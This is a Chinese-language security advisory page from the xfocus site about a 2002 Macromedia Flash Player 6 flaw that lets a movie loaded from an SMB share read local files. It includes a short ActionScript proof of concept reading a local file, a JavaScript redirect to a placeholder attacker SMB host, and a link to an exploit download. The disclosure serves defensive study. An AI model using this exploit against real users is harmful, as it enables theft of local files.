xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Macromedia Flash Player存在文件访问漏洞


发布时间:2002-10-11
更新时间:2002-10-11
严重程度:
威胁程度:远程非授权文件存取
错误类型:设计错误
利用方式:服务器模式

BUGTRAQ ID:5904

受影响系统
Macromedia Flash 6.0
   + Microsoft Internet Explorer 5.0
   + Microsoft Internet Explorer 5.0.1
   + Microsoft Internet Explorer 5.0.1 SP1
   + Microsoft Internet Explorer 5.0.1 SP2
   + Microsoft Internet Explorer 5.5
   + Microsoft Internet Explorer 5.5 preview
   + Microsoft Internet Explorer 5.5 SP1
   + Microsoft Internet Explorer 5.5 SP2
   + Microsoft Internet Explorer 6.0
   + Netscape Communicator 4.6
   + Netscape Communicator 4.7
   + Netscape Communicator 4.51
   + Netscape Communicator 4.61
   + Netscape Communicator 4.72
   + Netscape Communicator 4.73
   + Netscape Communicator 4.74
   + Netscape Communicator 4.75
   + Netscape Communicator 4.76
   + Netscape Communicator 4.77
   + Netscape Communicator 4.78
   + Netscape Communicator 6.1
Macromedia Flash 6.0.29 .0
Macromedia Flash 6.0.40 .0
Macromedia Flash 6.0.47 .0
详细描述
macromedia flash player存在漏洞允许读和发送本地文件。

Flash Player在装载来自远程SMB共享的动画文件时存在问题,当Flash Player在从SMB网络共享中装载动画时可别欺骗从用户本地硬盘中装载。

攻击者可以使用FLASH PLAYER XML协议读取本地内容。

测试代码
使用如下代码可读取本地文件:

urlXML = new XML();
urlXML.onLoad = readXML;
myField = "Loading data...";
urlXML.load("file:///C:/jelmer.txt");

function readXML() {
myField = urlXML.toString();
}

可建立如下WEB页使用户访问:

<script language="javascript">
document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>

演示程序下载:

http://www.xs4all.nl/~jkuperus/exploit.zip

解决方案


相关信息
jelmer <jkuperus@xs1.xs4all.nl>
参考:http://online.securityfocus.com/archive/1/294206
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved